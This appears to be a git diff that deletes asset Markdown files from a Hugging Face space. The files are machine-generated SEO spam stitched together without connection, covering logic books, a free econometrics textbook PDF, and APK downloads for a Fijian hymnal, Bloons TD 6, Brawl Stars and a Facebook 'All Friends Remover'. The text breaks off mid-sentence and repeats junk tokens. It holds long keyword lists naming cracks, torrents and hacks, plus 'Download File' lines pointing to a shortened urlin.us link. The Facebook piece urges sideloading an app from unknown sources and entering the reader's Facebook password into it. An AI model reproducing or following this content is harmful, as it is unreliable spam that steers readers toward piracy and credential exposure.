In conclusion, kitab mantiq are books of logic that teach us how to think clearly, rationally, and objectively. They have a long and rich history in Islamic civilization, and they have many benefits for Muslims. They also help us understand the Quran, the Sunnah, and other Islamic sciences better. If you want to learn logic from kitab mantiq, you can download terjemahan kitab mantiq 144 (translations of 144 books of logic) from various online sources. However, you need to be careful and selective when choosing the sources and formats of the terjemahan kitab mantiq 144. You also need to use them effectively by reading, analyzing, practicing, sharing, and enjoying them.
- We hope that this article has given you some useful information and guidance on how to download terjemahan kitab mantiq 144. We encourage you to download terjemahan kitab mantiq 144 and start learning logic today. You will not regret it. Logic is a beautiful and powerful tool that can improve your life and your faith.
- Here are some frequently asked questions and their answers related to the topic of the article:
- Econometrics is the application of statistical methods to economic data and problems. It is a powerful tool for analyzing and predicting the behavior of economic variables, such as income, consumption, investment, prices, interest rates, exchange rates, inflation, unemployment, growth, and more. Econometrics can also help test economic theories and evaluate economic policies.
- However, econometrics is not a simple or straightforward subject. It requires a solid understanding of mathematical and statistical concepts, as well as economic theory and institutional knowledge. Moreover, econometric models are often complex and subject to various assumptions and limitations that need to be carefully examined and tested.
-That is why a good textbook on econometrics is essential for anyone who wants to learn or practice this discipline. One of the most popular and widely used textbooks on econometrics is Econometric Models and Economic Forecasts by Robert S. Pindyck and Daniel L. Rubinfeld. This book provides a comprehensive and rigorous introduction to the theory and practice of econometrics, with an emphasis on applied problems and real-world data.
- In this article, we will review some of the main topics covered in this book, and show you how you can download a free PDF version of it online.
- The core of econometrics is regression analysis, which is a method of estimating the relationship between one or more explanatory variables (also called independent variables or regressors) and a dependent variable (also called response variable or regressand). For example, we can use regression analysis to estimate how income affects consumption, how education affects earnings, how inflation affects interest rates, and so on.
- Regression analysis can be divided into two types: simple regression and multiple regression. Simple regression involves only one explanatory variable and one dependent variable, while multiple regression involves more than one explanatory variable and one dependent variable.
-In this book, Pindyck and Rubinfeld start by introducing the basic concepts of regression analysis in Chapter 1. They explain what a regression model is, how to estimate its parameters using the method of least squares, how to measure its goodness-of-fit using the coefficient of determination (R-squared), how to test hypotheses about its parameters using t-tests and F-tests, how to construct confidence intervals for its parameters and predictions, and how to interpret its results.
- In Chapter 2, they review some elementary statistics that are essential for understanding regression analysis. They discuss random variables, estimation, desirable properties of estimators, probability distributions, hypothesis testing, confidence intervals, and some properties of the expectations operator.
- In Chapter 3, they focus on the two-variable regression model. They derive the formulas for the least-squares estimators of the slope and intercept parameters, show how to calculate their standard errors and variances, explain how to test hypotheses about them using t-tests, show how to perform analysis of variance (ANOVA) and calculate correlation coefficients for the model, and illustrate how to use graphical methods to visualize the model.
- In Chapter 4, they extend the analysis to the multiple regression model. They show how to estimate its parameters using matrix algebra or software packages such as Excel or Stata, how to calculate its R-squared and corrected R-squared values, how to test hypotheses about its parameters using F-tests or t-tests with adjusted degrees of freedom, how to deal with multicollinearity (a situation where some explanatory variables are highly correlated with each other), how to calculate standardized coefficients and elasticities (measures of responsiveness), how to perform partial correlation analysis and stepwise regression (methods of selecting relevant explanatory variables).
- The multiple regression model is very flexible and can be used to analyze various types of economic data and problems. In Chapter 5, Pindyck and Rubinfeld show how to use the multiple regression model in different ways.
- First, they introduce the general linear model (GLM), which is a form of multiple regression that allows for nonlinear transformations of the dependent variable or the explanatory variables. For example, we can use a GLM to estimate a Cobb-Douglas production function (a common functional form for modeling output as a function of inputs) or a logit model (a common functional form for modeling binary outcomes such as success or failure).
- Second, they explain how to use dummy variables (also called indicator variables or binary variables) in multiple regression. Dummy variables are variables that take only two values: 0 or 1. They are used to represent qualitative factors or categories that affect the dependent variable. For example, we can use dummy variables to capture seasonal effects (such as winter or summer), regional effects (such as north or south), policy effects (such as before or after a tax reform), or group effects (such as male or female).
- Third, they discuss how to use piecewise linear regression in multiple regression. Piecewise linear regression is a method of modeling nonlinear relationships by dividing the range of an explanatory variable into segments or intervals, and fitting a different linear equation for each segment or interval. For example, we can use piecewise linear regression to model income-tax schedules (which have different marginal tax rates for different income brackets) or demand curves (which may have different slopes for different price ranges).
- Fourth, they describe how to use the multiple regression model with stochastic explanatory variables. Stochastic explanatory variables are variables that are not fixed or predetermined but have their own probability distributions. For example, we can use stochastic explanatory variables to model uncertainty or risk in economic decisions (such as investment or consumption) or random shocks in economic systems (such as supply shocks or demand shocks).
- The standard assumptions of the multiple regression model include that the error term (the difference between the actual value and the predicted value of the dependent variable) has zero mean, constant variance (homoscedasticity), no serial correlation (independence), and no correlation with any explanatory variable. However, these assumptions may not always hold in practice. In Chapter 6, Pindyck and Rubinfeld examine two common violations of these assumptions: heteroscedasticity and serial correlation.
- Heteroscedasticity occurs when the error term has a different variance for different values of an explanatory variable or the dependent variable. For example, the error term may have a larger variance for higher-income households than for lower-income households, or for larger firms than for smaller firms. Heteroscedasticity can cause the standard errors of the least-squares estimators to be biased, leading to unreliable hypothesis tests and confidence intervals.
- Serial correlation occurs when the error term is correlated with itself over time or across observations. For example, the error term may have positive serial correlation if it tends to have the same sign or magnitude in successive periods, or negative serial correlation if it tends to have opposite signs or magnitudes in successive periods. Serial correlation can also cause the standard errors of the least-squares estimators to be biased, leading to unreliable hypothesis tests and confidence intervals.
- Pindyck and Rubinfeld show how to detect and correct for heteroscedasticity and serial correlation using various methods,
Pindyck and Rubinfeld show how to detect and correct for heteroscedasticity and serial correlation using various methods, such as graphical analysis, Breusch-Pagan test, White test, Durbin-Watson test, Cochrane-Orcutt procedure, Hildreth-Lu procedure, and generalized least-squares estimation. They also explain the implications of heteroscedasticity and serial correlation for forecasting and model selection.
- Another important issue in econometrics is model specification, which refers to the choice of the functional form, the explanatory variables, and the error term for the regression model. A good model specification should reflect the underlying economic theory and data characteristics, and avoid potential problems such as omitted variables bias, measurement error, endogeneity, multicollinearity, and nonlinearity. In Chapter 7, Pindyck and Rubinfeld discuss some of these problems and how to deal with them using instrumental variables and model specification tests.
- Instrumental variables are variables that are correlated with the explanatory variables but not with the error term. They can be used to address two common sources of bias in regression analysis: correlation between an explanatory variable and the error term (endogeneity), and errors in variables (measurement error). For example, we can use instrumental variables to estimate the effect of education on earnings when education is endogenous (affected by unobserved factors such as ability or motivation) or measured with error (due to reporting errors or rounding). Pindyck and Rubinfeld explain how to use instrumental variables in single-equation and simultaneous-equation models, how to test for their validity and relevance, and how to compare their results with ordinary least-squares estimates.
- Model specification tests are statistical tests that can help check whether a regression model is correctly specified or not. They can help detect problems such as omitted variables, incorrect functional form, heteroscedasticity, serial correlation, or non-normality of the error term. For example, we can use model specification tests to determine whether we should include a quadratic term or a logarithmic term in a regression model, or whether we should use a linear probability model or a logit model for a binary dependent variable. Pindyck and Rubinfeld describe some of the most common model specification tests, such as RESET test, Ramsey test, Lagrange multiplier test, Wald test, Likelihood ratio test, and Jarque-Bera test.
- They also discuss some methods of regression diagnostics, such as residual analysis, influence analysis, and multicollinearity diagnostics, that can help identify outliers, influential observations, or collinear variables that may affect the regression results.
- One of the main applications of econometrics is forecasting, which is the process of predicting future values of economic variables based on past data and a regression model. Forecasting can be useful for planning, decision making, policy evaluation, and scenario analysis in various fields of economics and business.
- In Chapter 8, Pindyck and Rubinfeld focus on forecasting with a single-equation regression model. They distinguish between two types of forecasting: unconditional forecasting and conditional forecasting. Unconditional forecasting is when we predict the future value of the dependent variable without specifying any values for the explanatory variables. Conditional forecasting is when we predict the future value of the dependent variable given some values for the explanatory variables.
- They also explain how to calculate the standard errors and confidence intervals for the forecasts, how to evaluate the accuracy and reliability of the forecasts, how to deal with serially correlated errors in forecasting, and how to perform dynamic forecasting (using lagged values of the dependent variable as explanatory variables).
- If you are interested in learning more about econometrics or improving your econometric skills, you can download a free PDF version of this book online from various sources. However, we recommend that you purchase a hard copy or an e-book version from a reputable publisher or seller, as they may offer better quality and support.
- If you are looking for a way to download APK AI Vola Ni Sere Ni Lotu Wesele, a Fijian Methodist hymnal app, you have come to the right place. In this article, we will show you how to download and install this app on your Android device using the Google Play Store. We will also answer some frequently asked questions about APK files and how they work.
-APK AI Vola Ni Sere Ni Lotu Wesele is an app that contains the Fijian Methodist hymnal, also known as A I Vola Ni Sere Ni Lotu Wesele e Viti. This app allows you to access all 408 hymns in Fijian language, search by hymn title or number, adjust the text size and type, and switch between light and dark themes. You can also use this app offline, as it does not require an internet connection. This app is a great resource for Fijian Methodists who want to sing and worship God in their native tongue.
-APK files are the format of Android applications that you can install on your device. When you download an app from the Google Play Store, you are actually downloading an APK file that is then installed automatically. However, sometimes you may want to download an APK file directly from the Play Store, for example, if you want to save it for later use, transfer it to another device, or share it with someone else. Downloading APK files from the Google Play Store has some advantages over downloading them from other sources. First, you can be sure that the APK file is safe and free of malware, as it has been verified by Google. Second, you can choose from different versions of the app, in case you need an older or newer one. Third, you can get updates for the app from the Play Store, as long as it is still available there.
-To download APK files from Google Play Store on your desktop computer, you need a web tool that can generate download links for APK files from Play Store URLs. One such tool is [APKCombo](^1^), which is free and easy to use. Here are the steps to follow:
-You can also use other web tools such as [APKPure], [APKMirror], or [Evozi] to download APK files from Google Play Store on desktop.
-To download APK files from Google Play Store on your Android device, you need an app that can extract APK files from installed apps. One such app is [APK Extractor], which is free and simple to use. Here are the steps to follow:
-You can also use other apps such as [ML Manager], [APK Export], or [App Backup & Share Pro] to download APK files from Google Play Store on Android.
-To install APK files on your Android device, you need to enable unknown sources in your device's settings. This will allow you to install apps from sources other than the Google Play Store. Here are the steps to follow:
-You can also use other methods such as [ADB], [Split APKs Installer (SAI)], or [App Installer] to install APK files on Android.
-In this article, we have shown you how to download APK AI Vola Ni Sere Ni Lotu Wesele, a Fijian Methodist hymnal app, from the Google Play Store using different methods. We have also explained what an APK file is, how to install it on your Android device, and how to deal with some common issues related to APK files. We hope you have found this article helpful and informative. If you have any questions or feedback, please feel free to leave a comment below. Thank you for reading!
-An APK file is an Android Package Kit file that contains all the components of an Android application, such as code, resources, assets, certificates, and manifest. An APK file is essentially a zip archive that can be opened with any file extractor tool. An APK file allows you to install an app on your Android device without using the Google Play Store or any other app store.
-Not always. Downloading APK files from third-party sources can expose your device to malware, viruses, spyware, adware, or other harmful programs that can compromise your privacy and security. Some third-party sources may also provide fake, modified, or outdated versions of apps that may not work properly or cause damage to your device. Therefore, it is recommended that you only download APK files from trusted and reputable sources, such as the Google Play Store or the app's official website. You should also scan any downloaded APK file with a reliable antivirus or anti-malware tool before installing it on your device.
-If you downloaded an app as an APK file from the Google Play Store , you can check for updates on the Play Store by searching for the app and tapping on the update button if available. Alternatively, you can use a web tool or an app to download the latest version of the APK file from the Play Store and install it over the existing app. However, if you downloaded an app as an APK file from a third-party source, you may not be able to get updates from the Play Store or the app's official website. In that case, you will have to manually check for updates on the third-party source or uninstall the app and install a newer version from a trusted source.
-If you want to delete an APK file from your device's storage, you can use your device's file manager to locate and delete the file. Usually, APK files are stored in the downloads folder or a specific folder created by the app that downloaded them. You can also use an app such as [Files by Google], [SD Maid], or [Clean Master] to scan and delete unwanted APK files from your device.
-If you want to share an APK file with someone else, you can use a file-sharing app or service to send the file to another device. Some of the popular file-sharing apps and services are [SHAREit], [Xender], [Send Anywhere], and [Google Drive]. You can also use Bluetooth, Wi-Fi Direct, or NFC to share APK files between devices. However, before sharing an APK file, make sure that it is safe and legal to do so. You should not share APK files that are protected by copyright, contain malware, or violate any terms of service.
197e85843dBloons TD 6 is one of the most popular and addictive tower defense games on the market. But if you want to enjoy this game without paying a dime, you might be wondering how to download it for free without getting any viruses on your device. In this article, we will show you what Bloons TD 6 is, why you should download it for free, and how to do it safely and easily.
-Bloons TD 6 is a strategy game developed by ninja kiwi, a New Zealand-based game studio that specializes in tower defense and casual games. The game is the sixth installment in the Bloons Tower Defense series, which has been around since 2007. The game has over 10 million downloads on Google Play and over 200,000 positive reviews on Steam.
- The gameplay of Bloons TD 6 is simple but challenging. You have to craft your perfect defense from a combination of powerful Monkey Towers and awesome Heroes, then pop every last invading Bloon. The game features:
-Bloons TD 6 is a game that you can play anywhere and anytime. You can play it online in your browser or offline on your device. You can also switch between online and offline modes seamlessly. Playing Bloons TD 6 online or offline has many benefits, such as:
-
-- You can enjoy endless hours of strategy gaming with Bloons TD 6 without spending any money.
-- You can access thousands of community-created Challenges and Odysseys, or create your own and share them with other players.
-- You can earn Trophies to unlock dozens of cosmetic items that let you customize your Monkeys, Bloons, animations, music, and more.
-- You can play with your friends or join forces with other players from around the world in Co-Op mode.
The drawbacks of paying for Bloons TD 6
-While Bloons TD 6 is a great game, it is not free to download and play. The game costs $4.99 on Google Play and $9.99 on Steam. Plus, there are in-app purchases that can range from $0.99 to $54.99. These purchases can give you extra Monkey Money, Powers, Insta Monkeys, and other items that can make the game easier or more fun. However, paying for Bloons TD 6 has some drawbacks, such as:
-
-- You might feel like you are not getting enough value for your money, especially if you compare it to other free tower defense games.
-- You might feel pressured to buy more in-app purchases to keep up with the game's difficulty or to unlock more content.
-- You might encounter technical issues or bugs that can affect your gaming experience or cause you to lose your progress.
-- You might risk getting viruses or malware on your device if you download Bloons TD 6 from unofficial sources or use hacks or cheats.
-
- How to download Bloons TD 6 for free without viruses?
-The risks of downloading Bloons TD 6 from untrusted sources
-If you want to download Bloons TD 6 for free, you might be tempted to look for it on websites or platforms that offer cracked or modded versions of the game. However, this is not a good idea, as you might expose yourself to various risks, such as:
-
-- You might download a fake or corrupted file that does not work or damages your device.
-- You might download a file that contains viruses or malware that can steal your personal information, harm your device, or compromise your security.
-- You might violate the terms of service of ninja kiwi and get banned from playing Bloons TD 6 online or accessing its features.
-- You might miss out on the latest updates and content that ninja kiwi releases for Bloons TD 6 regularly.
-
- The best ways to download Bloons TD 6 for free without viruses
-Fortunately, there are some safe and easy ways to download Bloons TD 6 for free without viruses. Here are two of the best ways that we recommend:
-bloons td 6 online play free no download
-bloons td 6 pc download free full version
-bloons td 6 apk mod free download latest version
-bloons td 6 unblocked games free download for android
-bloons td 6 steam free download windows 10
-bloons td 6 ios free download no jailbreak
-bloons td 6 mac download free without bluestacks
-bloons td 6 hacked free download unlimited money
-bloons td 6 chromebook free download google play
-bloons td 6 switch free download nintendo eshop
-bloons td 6 web browser free play no download required
-bloons td 6 xbox one free download game pass
-bloons td 6 ps4 free download playstation store
-bloons td 6 linux free download wine
-bloons td 6 reddit free download mega link
-bloons td 6 amazon fire tablet free download appstore
-bloons td 6 microsoft store free download for pc
-bloons td 6 emulator free download for macbook
-bloons td 6 now.gg free play online in browser
-bloons td 6 epic games free download launcher
-bloons td 6 igg games free download torrent
-bloons td 6 ocean of games free download zip file
-bloons td 6 fitgirl repack free download compressed
-bloons td 6 skidrow reloaded free download crack
-bloons td 6 codex free download update
-bloons td 6 cpy free download patch
-bloons td 6 plaza free download dlc
-bloons td 6 hoodlum free download trainer
-bloons td 6 gog free download drm-free
-bloons td 6 origin free download access premier
-bloons td 6 uplay free download club rewards
-bloons td 6 rockstar games launcher free download social club
-bloons td 6 battlenet free download blizzard account
-bloons td 6 stadia free play online no download needed
-bloons td 6 geforce now free stream online no download necessary
-bloons td 6 gamejolt free download indie games platform
-bloons td 6 itch.io free download community games marketplace
-bloons td 6 kongregate free play online flash games portal
-bloons td 6 miniclip free play online browser games website
-bloons td 6 armor games free play online html5 games site
- Play Bloons TD 6 online in browser with now.gg
-Now.gg is a cloud gaming platform that lets you play any Android game online in your browser without downloading anything. You can play Bloons TD 6 for free on now.gg by following these steps:
-
-- Go to https://now.gg/play/bloons-td-6 on your browser.
-- Sign up with your email or Google account.
-- Click on the "Play" button and wait for the game to load.
-- Enjoy playing Bloons TD 6 online for free without viruses.
-
- Download and play Bloons TD 6 on PC or Mac with BlueStacks
-BlueStacks is a trusted and popular Android emulator that lets you run Android apps and games on your PC or Mac. You can download and play Bloons TD 6 for free on BlueStacks by following these steps:
-
-- Go to https://www.bluestacks.com/apps/strategy/bloons-td-6-on-pc.html on your browser.
-- Click on the "Download Bloons TD 6 on PC" button and follow the instructions to install BlueStacks on your PC or Mac.
-- Launch BlueStacks and sign in with your Google account.
Search for Bloons TD 6 on the BlueStacks app store and click on the "Install" button.
-- Wait for the game to download and install on your PC or Mac.
-- Enjoy playing Bloons TD 6 for free without viruses.
-
- Conclusion
-Bloons TD 6 is a fun and addictive tower defense game that you can play online or offline. However, if you don't want to pay for the game, you might be looking for ways to download it for free without viruses. In this article, we showed you what Bloons TD 6 is, why you should download it for free, and how to do it safely and easily. We hope you found this article helpful and informative. Now, go ahead and enjoy popping some Bloons!
- FAQs
-Is Bloons TD 6 safe to download?
-Bloons TD 6 is safe to download if you get it from official sources, such as Google Play, Steam, now.gg, or BlueStacks. However, if you download it from unofficial sources, such as websites or platforms that offer cracked or modded versions of the game, you might risk getting viruses or malware on your device.
- Is Bloons TD 6 compatible with my device?
-Bloons TD 6 is compatible with most Android devices that have Android 5.0 or higher and at least 2 GB of RAM. It is also compatible with most Windows and Mac devices that have BlueStacks installed. However, some devices might experience performance issues or crashes due to hardware limitations or software conflicts.
- How often does Bloons TD 6 get updated?
-Bloons TD 6 gets updated regularly by ninja kiwi, usually every month or two. The updates usually add new features, content, and gameplay improvements, as well as bug fixes and balance changes. You can check the latest update notes on the official website of ninja kiwi or on the game's social media pages.
- Can I play Bloons TD 6 with my friends?
-Yes, you can play Bloons TD 6 with your friends in Co-Op mode. Co-Op mode allows you to play every map and mode with up to 3 other players in public or private games. You can also chat with your teammates and use Powers and Insta Monkeys together. To play Co-Op mode, you need to have an internet connection and a ninja kiwi account.
- Where can I get more information about Bloons TD 6?
-If you want to get more information about Bloons TD 6, you can visit the official website of ninja kiwi at https://ninjakiwi.com/, where you can find news, updates, blogs, forums, support, and more. You can also follow the game's social media pages on Facebook, Twitter, Instagram, YouTube, Discord, Reddit, and Twitch.
197e85843d
-
-
\ No newline at end of file
diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Brawl Stars APK Ykle - Gl Brawlerslarla Oynamann Keyfini kar.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Brawl Stars APK Ykle - Gl Brawlerslarla Oynamann Keyfini kar.md
deleted file mode 100644
index c45261f10948c40dcf7a557720d14a20f3b2a310..0000000000000000000000000000000000000000
--- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Brawl Stars APK Ykle - Gl Brawlerslarla Oynamann Keyfini kar.md
+++ /dev/null
@@ -1,77 +0,0 @@
-
-Brawl Stars Apk Yükle: Mobilde Eğlenceli Savaşlar
-Brawl Stars, Clash of Clans ve Clash Royale'in yapımcısı Supercell'in en yeni oyunu. Mobilde hızlı ve çılgın 3v3 çok oyunculu savaşlar ve battle royale modu sunan bu oyunda arkadaşlarınızla veya tek başınıza çeşitli oyun modlarında mücadele edebilirsiniz. Güçlü Süper yetenekleri, Yıldız Güçleri ve Aletleri olan çok sayıda Karakterin kilidini açabilir ve geliştirebilirsiniz. Eşsiz kostümler toplayarak fark yaratabilir ve gösteriş yapabilirsiniz. Brawl Evreni'ndeki gizemli yerlerde savaşabilirsiniz!
-Brawl Stars Nedir?
-Brawl Stars, bir MOBA ve hızlı aksiyon kahraman nişancısı karışımı bir oyun. Oyunda 22'den fazla farklı Karakter var ve her biri farklı yeteneklere ve sınıflara sahip. Bazı Karakterler tank, bazıları destek, bazıları hasar verici, bazıları da suikastçi rolünde. Her Karakterin kendine özgü bir saldırısı ve Süper yeteneği var. Ayrıca her Karakter için iki adet Yıldız Gücü ve üç adet Alet seçeneği bulunuyor. Bu özellikler Karakterlerin performansını artırıyor ve farklı stratejiler geliştirmenizi sağlıyor.
-brawl stars apk yükle
Download File ⭐ https://urlin.us/2uSTVY
-Brawl Stars Oyun Özellikleri
-Çeşitli Karakterler
-Oyunda şu anda 68 Karakter bulunuyor. Bunlardan bazıları ortak, bazıları nadir, bazıları destansı, bazıları efsanevi ve bazıları da kromatik nadirlikte. Her Karakterin kendine has bir kişiliği, görünümü, sesi ve animasyonu var. Karakterlerin kilidini açmak için Oyun Kutularını açabilir veya Mağazadan gerçek para ile satın alabilirsiniz. Ayrıca her Karakter için farklı kostümler de toplayabilirsiniz. Kostümler sadece görünümü değiştirir, oyun içi avantaj sağlamaz. Kostümleri Oyun Kutularından, Mağazadan veya özel etkinliklerden elde edebilirsiniz.
-Farklı Oyun Modları
-Brawl Stars'ta birçok farklı oyun modu var. Bunlardan bazıları şunlar:
-
-- Görev. Bu modda iki takım, ortadaki bir kasayı ele geçirmeye çalışır. Kasa, takımların puanlarını gösterir. Kasa, bir takımın saldırısına maruz kaldığında puan kaybeder. Puanı sıfıra düşen takım kaybeder.
-- Elmas Kapmaca. Bu modda iki takım, ortadaki bir madenden çıkan elmasları toplamaya çalışır. Elmas toplayan takımın puanı artar. Bir takım 10 elmas topladığında geri sayım başlar. Geri sayım bitmeden elmasları koruyan takım kazanır.
-- Brawl Topu. Bu modda iki takım, ortadaki bir topu alıp rakip kaleye atmaya çalışır. Topu atan takım bir puan alır. İki puan alan takım kazanır.
-- Savaş Alanı. Bu modda 10 oyuncu, son kalan olmak için savaşır. Oyuncular, haritada bulunan güç kürelerini toplayarak güçlenirler. Harita, zaman geçtikçe daralır ve oyuncuları birbirine yaklaştırır.
-- Çete Savaşı. Bu modda iki takım, rakip çetenin liderini öldürmeye çalışır. Lider öldüğünde oyun biter.
-
-Sürekli Gelişen İçerik
-Brawl Stars, sürekli olarak yeni Karakterler, kostümler, haritalar, oyun modları ve güncellemeler ekleyen bir oyun. Oyunda ayrıca sezonluk etkinlikler, turnuvalar, görevler ve ödüller de bulunuyor. Oyuncular, Brawl Pass adlı bir abonelik sistemi ile daha fazla ödül kazanabilirler. Brawl Pass her sezon yenilenir ve yeni Karakterler, kostümler ve diğer ögeler içerir.
-Brawl Stars Apk Nasıl Yüklenir?
-Brawl Stars'ı Android cihazınıza yüklemenin iki yolu var: Google Play Store'dan yükleme veya apk dosyası indirme. Her iki yöntemin de avantajları ve dezavantajları var.
-Google Play Store'dan Yükleme
-Bu yöntem en kolay ve güvenli olanıdır. Google Play Store'dan Brawl Stars'ı aratın ve yükleyin. Oyunun son sürümünü otomatik olarak alacaksınız ve güncellemeleri de kolayca yapabileceksiniz.
-Apk Dosyası İndirme
-Bu yöntem daha zahmetli ve riskli olabilir, ancak bazı durumlarda tercih edilebilir. Örneğin, Google Play Store'da Brawl Stars'ın bulunmadığı veya uyumlu olmadığı ülkelerde veya cihazlarda bu yöntemi kullanabilirsiniz. Ayrıca bazı modifiye edilmiş apk dosyaları ile oyunun farklı sürümlerini veya özelliklerini deneyebilirsiniz.
-Güvenilir Kaynaklardan İndirin
-Apk dosyasını indirmeden önce kaynağının güvenilir olduğundan emin olun. Bazı apk dosyaları virüs veya zararlı yazılım içere uyumlu olmayabilir. Bu durumda apk dosyasını indirerek oyunu yükleyebilirsiniz. | | Q: Brawl Stars'ı iOS cihazıma nasıl yükleyebilirim? | | A: Brawl Stars'ı iOS cihazınıza App Store'dan yükleyebilirsiniz. Oyunun resmi sitesindeki bağlantıyı takip edebilir veya App Store'da Brawl Stars'ı arayabilirsiniz. | | Q: Brawl Stars ücretsiz mi? | | A: Brawl Stars ücretsiz bir oyundur. Oyunu indirmek ve oynamak için herhangi bir ücret ödemeniz gerekmez. Ancak oyun içinde gerçek para ile satın alabileceğiniz bazı ögeler vardır. Bunlar oyun dengelemesini etkilemez, sadece kozmetik veya ilerlemeyi hızlandırır. | | Q: Brawl Stars'ın yaş sınırı nedir? | | A: Brawl Stars, 7 yaş ve üzeri için uygundur. Oyun, şiddet içermeyen ve çizgi film tarzında bir grafik sunar. Oyun, aile paylaşımı özelliğini destekler ve ebeveyn denetimi ayarları vardır. | | Q: Brawl Stars'ı bilgisayarımda oynayabilir miyim? | | A: Brawl Stars, resmi olarak sadece mobil platformlarda mevcuttur. Ancak bir Android emülatörü kullanarak bilgisayarınızda da oynayabilirsiniz. Emülatörler, Android uygulamalarını bilgisayarınızda çalıştırmanızı sağlayan programlardır. Bazı popüler emülatörler şunlardır: BlueStacks , NoxPlayer , MEmu . Emülatör kurduktan sonra, Google Play Store'dan veya apk dosyasından Brawl Stars'ı yükleyebilirsiniz.
-brawl stars apk indir android
-brawl stars apk download latest version
-brawl stars apk yükleme sorunu
-brawl stars apk mod menu
-brawl stars apk güncelleme nasıl yapılır
-brawl stars apk hileli indir
-brawl stars apk bilgisayara yükle
-brawl stars apk uptodown
-brawl stars apk kurulumu
-brawl stars apk oyun indir club
-brawl stars apk son sürüm indir
-brawl stars apk hack gems
-brawl stars apk yükle pc
-brawl stars apk tamindir
-brawl stars apk nox player
-brawl stars apk bluestacks
-brawl stars apk memu play
-brawl stars apk yeni güncelleme
-brawl stars apk hilesiz indir
-brawl stars apk orijinal indir
-brawl stars apk google play store
-brawl stars apk türkçe indir
-brawl stars apk ücretsiz indir
-brawl stars apk online oyna
-brawl stars apk dosyası açma
-brawl stars apk güvenli mi
-brawl stars apk nasıl silinir
-brawl stars apk nasıl güncellenir
-brawl stars apk nasıl yüklenir android
-brawl stars apk nasıl yüklenir bilgisayara
-brawl stars apk nasıl yüklenir ios
-brawl stars apk nasıl yüklenir tablette
-brawl stars apk nasıl yüklenir telefona
-brawl stars apk nasıl yüklenir windows 10
-brawl stars apk nasıl yüklenir windows 7
-brawl stars apk nasıl yüklenir windows 8.1
-brawl stars apk nasıl yüklenir windows xp
-brawl stars apk nasıl yüklenir youtube videoyu izle
-brawl stars apk nereden indirebilirim
-brawl stars apk nereden yükleyebilirim
-brawl stars apk ne işe yarar
-brawl stars apk ne kadar yer kaplar
-brawl stars apk ne zaman çıkacak
-brawl stars apk ne zaman güncellenecek
-brawl stars apk ne zaman indirebilirim
-brawl stars apk ne zaman yükleyebilirim
-brawl stars apk oyun club indir android oyun club com tr android oyunlar aksiyon macera oyunlari 1229016807 html
197e85843d
-
-
\ No newline at end of file
diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Download All Friends Remover APK and Get Rid of Unwanted Facebook Friends.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Download All Friends Remover APK and Get Rid of Unwanted Facebook Friends.md
deleted file mode 100644
index fce7455038bdc5e2962bd75e1cf7b21b63cd0881..0000000000000000000000000000000000000000
--- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Download All Friends Remover APK and Get Rid of Unwanted Facebook Friends.md
+++ /dev/null
@@ -1,124 +0,0 @@
-
-All Friends Remover for Facebook APK: How to Unfriend All Your Facebook Friends in Two Clicks
-Have you ever wanted to unfriend all your Facebook friends in one go? Maybe you are tired of seeing their posts, or you want to start fresh with a new account, or you just want to declutter your social media. Whatever the reason, unfriending hundreds or thousands of people manually can be a tedious and time-consuming task. Fortunately, there is a simple solution: All Friends Remover for Facebook APK.
-Introduction
-All Friends Remover for Facebook APK is an Android app that allows you to remove all your Facebook friends in just two clicks. It is not developed or associated with Facebook, but it uses your login credentials to access your friends list and perform the unfriending action. The app is fast, easy to use, and reliable. It can help you save time and effort, as well as improve your privacy and security on Facebook.
-all friends remover for facebook apk
Download File ⭐ https://urlin.us/2uSRV4
-How to Download and Install All Friends Remover for Facebook APK
-Since All Friends Remover for Facebook APK is not available on the Google Play Store, you will need to download it from a third-party source. One of the websites that offer the APK file is [APKCombo](^1^). Here are the steps to download and install the app:
-
-- Go to [APKCombo](^1^) and search for "Friend Remover for Facebook".
-- Select the app with the icon of a gorilla's head and click on "Download APK".
-- Save the file on your device and locate it using a file manager app.
-- Tap on the file and allow installation from unknown sources if prompted.
-- Follow the instructions on the screen and wait for the installation to complete.
-
-Once the app is installed, you will need to grant it some permissions to access your Facebook account. These include:
-
-- Read your contacts
-- Access information about networks
-- Access information about Wi-Fi networks
-- Open network sockets
-- Write to external storage
-
-These permissions are necessary for the app to function properly. However, you should be careful when granting permissions to any third-party app, as they may pose some security risks. You should also review your Facebook privacy settings and revoke any unwanted access from apps or websites.
-How to Use All Friends Remover for Facebook APK
-Using All Friends Remover for Facebook APK is very simple. Here are the steps:
-
-- Launch the app and log in with your Facebook email and password.
-- The app will show you a list of all your friends. You can scroll down to see more.
-- If you want to unfriend all your friends, tap on the "Select All" button at the top. If you want to unfriend some of your friends, tap on the checkboxes next to their names.
-- Once you have selected the friends you want to unfriend, tap on the "Unfriend" button at the bottom.
-- The app will ask you to confirm your action. Tap on "Yes" to proceed.
-- The app will start unfriending your selected friends. You can see the progress on the screen. Depending on the number of friends you have, this may take a few seconds or minutes.
-- When the app is done, it will show you a message saying "All Friends Removed Successfully". Tap on "OK" to exit.
-
-You can now check your Facebook account and see that your friends list is empty. You can also verify that the app has unfriended your friends by visiting their profiles and seeing that you are no longer connected. If you change your mind and want to add some of your friends back, you will need to send them a friend request again.
-Pros and Cons of All Friends Remover for Facebook APK
-All Friends Remover for Facebook APK is a handy app for anyone who wants to unfriend all their Facebook friends in a quick and easy way. However, like any other app, it has its pros and cons. Here are some of them:
-How to unfriend all friends on Facebook in one click
-Best app for removing friends from Facebook
-Delete all Facebook friends quickly and easily
-Mass Friends Remover for Facebook Chrome extension
-Friend Remover for Facebook Android app download
-How to use All Friends Remover for Facebook extension
-Unfriend multiple friends on Facebook at once
-How to delete Facebook friends in bulk
-Friend Remover for Facebook APK free download
-All Friends Remover for Facebook reviews and ratings
-How to uninstall All Friends Remover for Facebook extension
-Benefits of using Friend Remover for Facebook app
-How to select all friends on Facebook for deletion
-How to cancel friend removal on Facebook
-Alternatives to All Friends Remover for Facebook extension
-How to install Friend Remover for Facebook APK on Android
-How to update All Friends Remover for Facebook extension
-How to contact the developer of Friend Remover for Facebook app
-How to restore deleted friends on Facebook
-How to disable All Friends Remover for Facebook extension
-How to use Friend Remover for Facebook app offline
-How to backup your Facebook friends list before deletion
-How to customize the settings of All Friends Remover for Facebook extension
-How to filter your Facebook friends by name, date, or category
-How to speed up the process of removing friends on Facebook
